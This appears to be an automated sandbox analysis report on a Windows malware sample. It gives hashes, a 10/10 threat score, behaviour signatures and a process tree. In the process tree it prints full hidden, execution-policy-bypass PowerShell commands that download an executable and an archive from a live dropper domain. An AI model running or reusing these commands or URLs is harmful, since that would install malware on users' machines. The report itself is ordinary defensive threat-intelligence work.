Overview

overview

10

Static

static

10

0811cf7c27...de.exe

windows7-x64

9

0dd0b31f05...24.exe

windows7-x64

7

1ad888606f...e0.exe

windows7-x64

3

1c77a07e45...95.exe

windows7-x64

10

23f1c183af...bc.exe

windows7-x64

10

38e891599d...90.exe

windows7-x64

10

3a13e092e9...db.exe

windows7-x64

4

3b9dabd99d...82.exe

windows7-x64

3

58fe9776f3...06.exe

windows7-x64

10

5ab93bd422...11.exe

windows7-x64

3

6b06c25fc6...43.exe

windows7-x64

10

6cc8001c9b...07.exe

windows7-x64

1

73ca5dd6d4...3f.exe

windows7-x64

10

7b931d48ea...f0.exe

windows7-x64

10

7d6892645b...0f.exe

windows7-x64

10

9036aeb570...7e.exe

windows7-x64

3

9b6289a8bf...2b.exe

windows7-x64

8

acf2b76704...a7.exe

windows7-x64

3

af2f191f8d...53.exe

windows7-x64

10

cc7045d9fe...ab.dll

windows7-x64

10

d1a6bd542d...a8.exe

windows7-x64

10

efe947e0a8...69.exe

windows7-x64

10

f13edd0b86...9f.exe

windows7-x64

10

Resubmissions

27-11-2024 13:29

241127-qrb37svpcv 10

27-11-2024 09:27

241127-le54astrfj 10

Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27-11-2024 13:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe

  • Size

    212KB

  • MD5

    43b55685945d2cecc170b850cf622038

  • SHA1

    3b301a8a8a38dddd3cfb554b264342f9948102b0

  • SHA256

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f

  • SHA512

    ba08284c9c07150f68fc92be46cdf058caa0b6f9b25135cc2716c286efdbcfd59d79f5bf211260d900ac3fd8fe78b582010ae8985b2f240829c9b94020ae7a65

  • SSDEEP

    3072:DNDzKKCY4RZzOo8u2IJskwUu25iiik4l9ep6RHpm0/d2IK9EzB2tPNxBWg3facbN:pDGKClZl8P6KVRH83TtVf33bncxfq

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/2222z.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/1111z.php

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe
    "C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\ewqeq.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Windows\system32\PING.EXE
        ping localhost -n 6
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/2222z.php','C:\Users\Admin\AppData\Roaming\7za.exe');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2820
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/1111z.php','C:\Users\Admin\AppData\Roaming\25520.7z');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1924

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    4c662ba18260b73219076f55871b4c13

    SHA1

    344b3210bbf97d1c12126d32189773417997dd2b

    SHA256

    5c237ceac8a6f2fd6a42df0251fda839d5f20f02787addb1b627001310ce6325

    SHA512

    1028c4094d84420c32e5f2c4fc8e1f3fbccb17deca458849e5db7fd65d8056d54b03d899a697298b9da2960ddd049c4c1547853c36c133b3106510bca4804745

    Download Submit

  • C:\Users\Admin\AppData\Roaming\ewqeq.cmd
    Filesize

    5KB

    MD5

    03868028bcd5c24c468e2c66571fb850

    SHA1

    c1dbed55b06bcc1b6a6211f7f8de592d92beb911

    SHA256

    c9bbb054e47836ee23efdb0c3d4ad193f7cbad635cfc9f2ba37da1d912a8b313

    SHA512

    d3527a2b639e694a2c4c9ab3279092f6e470a7e86b3bd5aff3fdfe63760eee2c4393f0b43067e6d922064fabef6c510008676cabb9031aaf3fbee4305ab6c999

    Download Submit

  • memory/1924-18-0x000000001B760000-0x000000001BA42000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1924-19-0x0000000002320000-0x0000000002328000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2636-4-0x0000000001F50000-0x0000000001F60000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2820-10-0x0000000002CE0000-0x0000000002D60000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2820-11-0x000000001B630000-0x000000001B912000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2820-12-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB

    Download